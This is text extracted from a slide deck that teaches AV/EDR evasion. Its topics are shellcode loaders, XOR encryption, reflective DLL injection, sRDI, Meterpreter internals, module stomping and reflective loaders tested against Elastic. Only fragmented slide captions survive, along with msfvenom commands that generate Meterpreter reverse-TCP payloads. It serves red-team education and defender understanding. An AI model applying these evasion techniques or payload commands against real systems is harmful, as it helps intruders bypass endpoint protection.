# https://docs.google.com/presentation/d/1qn-JkqwkYZCY391gZNmPZhTw9gYENIbhgRNJAg3dXf0/edit#slide=id.g3322b3aca21_0_117
Demystifying AV/EDR Evasion
Hello, can you please turn off Defender? 🥺🥺
whoami
Some topics discussed are kept intentionally vague or surface-level for brevity and may result in unfavorable outcomes if not fully understood.
Prologue
Table of Contents
What is AV? What is EDR?
Introduction to Evasion
01
Understanding your Tradecraft
03
Writing your own malware
Tame the AV
02
putting what we learnt into practice (Elastic 12.2)
Memory Gymnastics
04
Meterpreter Case Study
Introduction To Evasion
01
Why should I care?
Anti-Virus (AV)
Detection Methods (AV)
Static Analysis
file hash or known malicious bytes
Detection Methods (AV)
behavior of the malware
Dynamic Analysis
AMSI Patch
Get-MpThreatDetection | Select-Object ProcessName, Resources | Format-List
Detection Methods (AV cont.)
Cloud Analysis
Tame the AV
02
how 2 run C2 :(
how 2 run C2 :(
Shellcode TLDR
Meterpreter Shellcode
3 steps
ignore this for now
1
2
3
long live the shellcode
long live the shellcode
meterpreter makes it ez for u!
4 steps!
1
2
3
4
Recap
2. decryption function (xor)
2. decryption function (xor)
3. decrypt shellcode
4. allocate memory for shellcode
5. copy shellcode into memory
our shellcode
redirect execution to shellcode
shellcode
thread @ shellcode
why encrypt shellcode?
finding the detection
shellcode!
.data section is where global variables are declared & stored
long live the shellcode
TLDR
No encryption + raw shellcode on disk = bad
Missing Puzzle Pieces (Part 1)
Missing Puzzle Pieces (Part 1)
Missing Puzzle Pieces (Part 1)
Pipe Creation
Start Pipe
Missing Puzzle Pieces (Part 1)
Pipe Creation
Start Pipe
Missing Puzzle Pieces (Part 1)
Start Pipe
Missing Puzzle Pieces (Part 1)
Start Pipe
When you do sus things, memory scans happen
our shellcode is not encrypted anymore :(
Missing Puzzle Pieces (Part 1)
TLDR
getting your callback is only the first step
Understanding your
Tradecraft
03
Missing Puzzle Pieces (Part 2)
context (native api)
some malware call ntapis directly
x64dbg-ing
thread creation
Address of shellcode
ZwCreateThreadEx called
we’re here
additional memory allocation?!
Address of shellcode
ZwCreateThreadEx called
ZwAllocateVirtualMemory called again ?
and thread creation?
Address of shellcode
ZwCreateThreadEx called
ZwAllocateVirtualMemory called again ??
Another thread created?
This is not the memory we allocated
It’s always the black box
DLL Loading
Reflective DLL Injection
Reflective DLL Injection
Reflective DLL Injection
Find ReflectiveLoader()
classic shellcode injection
Start thread at ReflectiveLoader() instead!
Reflective DLL Injection
we’re getting very close to shellcode
shellcode reflective DLL injection (srdi)
what if we placed “LoadRemoteLibraryR” inside of the Reflective DLL?
this is… shellcode!
shellcode reflective DLL injection (srdi)
hotpatching the DOS header (trampoline)
LoadRemoteLibraryR in raw assembly!
the shellcode is a lie
meterpreter is a DLL
pebear @ meterpreter shellcode
Original name of the DLL from the compiler!
shellcode.bin
meterpreter srdi
DOS header entrypoint is patched with a small stub that redirects execution to metsrv.dll->ReflectiveLoader()
LoadRemoteLibraryR
The DOS Hotpatch
The DOS Hotpatch
DOS Header @ shellcode.bin
DOS Header @ notepad.exe
trampoline!
Trampolines
Trampoline to ReflectiveLoader()
Calculate Address of ReflectiveLoader()
Trampolines
ReflectiveLoader
Beacon->DllMain
main beacon loop
meterpreter srdi
that’s your shellcode!
Missing Puzzle Pieces (Part 2)
Our shellcode is allocating new memory, hmm…
Missing Puzzle Pieces (Part 2)
Address of shellcode
TLDR
meterpreter’s shellcode doesn’t respect the memory that you allocate
Meterpreter
Is that a bad thing? (No)
Meterpreter’s design is extremely flexible and stable!
This can be replaced with any language!
Executable Formats (--format aspx)
Memory Allocation
Shellcode Copy
Execute Shellcode
msfvenom -p windows/x64/meterpreter_reverse_tcp … --format aspx
Executable Formats (--format ps1)
Memory Allocation
Shellcode Copy
Execute Shellcode
msfvenom -p windows/x64/meterpreter_reverse_tcp … --format ps1
Memory Allocation
Shellcode Copy
Execute Shellcode
Executable Formats (--format vba)
Memory Allocation
Shellcode Copy
Execute Shellcode
msfvenom -p windows/x64/meterpreter_reverse_tcp … --format vba
Memory Allocation
Shellcode Copy
Execute Shellcode
Memory Allocation
Shellcode Copy
Execute Shellcode
Is that a bad thing? (YES)
you need manage memory in 2 locations: the shellcode loader & the ReflectiveLoader
https://x.com/_RastaMouse/status/1867899064907677755
Memory Gymnastics
04
EDR Evasion
much harder to evade if u don’t know what you’re doing
A Decade Old Technique
Almost every popular C2 framework uses some variation of sRDI to generate position independent beacon
every C2 framework uses the same technique
Memory Gymnastics
Why is unbacked memory so bad ?
Backed Memory?
Backed Memory?
Allocate RW
Flip to RX
Thread points to RX memory now
Private + RWX
Legitimate Memory
testing memory gymnastics
Unbacked RX (our shellcode loader from earlier)
Elastic 8.12.2
Elastic 8.12.2
Elastic 8.12.2
module stomping
Image taken from: https://naksyn.com/images/modulestomping.png
Backed Memory?
where’s my shellcode
Backed Memory?
here
Backed Memory?
Malleable C2
So what?
So what?
Our beacon finally lives in clean memory…
Elastic 8.12.2
Module-Backed RX
Elastic 8.12.2
Module-Backed RX
Recap
Cobalt Strike’s ReflectiveLoader allocates new memory
Can we get any more control ?
The User-Defined Reflective Loader (UDRL)
ReflectiveLoader
User-Defined Reflective Loader (> CS4.4)
BokuLoader (@0xBoku)
hooking the IAT
AceLoader (@kyleavery_)
AceLoader (@kyleavery_)
AceLoader (@kyleavery_)
AceLoader (@kyleavery_)
Return address spoofing
0xC2 (cube0x0)
Vendors are starting to move away from Reflective Loading
Hannibal (Mythic Agent)
Vendors are starting to move away from Reflective Loading
So… what’s next?
i’m lost af
i’m lost af
browsers!
languages w/ runtime
Conclusion
References & Recommended Reads
Everything shared is NOT NEW INFORMATION, the heavy lifting was done by much smarter people.
https://attl4s.github.io/assets/pdf/Understanding_a_Payloads_Life.pdf
https://cloud.google.com/blog/topics/threat-intelligence/defining-cobalt-strike-components
https://www.mdsec.co.uk/2022/07/part-1-how-i-met-your-beacon-overview/
https://www.mdsec.co.uk/2022/07/part-2-how-i-met-your-beacon-cobalt-strike/
https://ristbs.github.io/2023/02/08/your-pocket-guide-to-opsec-in-adversary-emulation.html
https://github.com/monoxgas/sRDI
https://dtsec.us/2023-09-15-StackSpoofin/
https://securityintelligence.com/x-force/defining-cobalt-strike-reflective-loader/
https://www.cobaltstrike.com/blog/cobalt-strike-4-5-fork-run-youre-history
https://kyleavery.com/posts/avoiding-memory-scanners/
https://5pider.net/blog/2024/01/27/modern-shellcode-implant-design/
https://www.0xc2.io/posts/introduction-and-technical-overview/
https://ericesquivel.github.io/posts/bypass
https://sillywa.re/posts/flower-da-flowin-shc/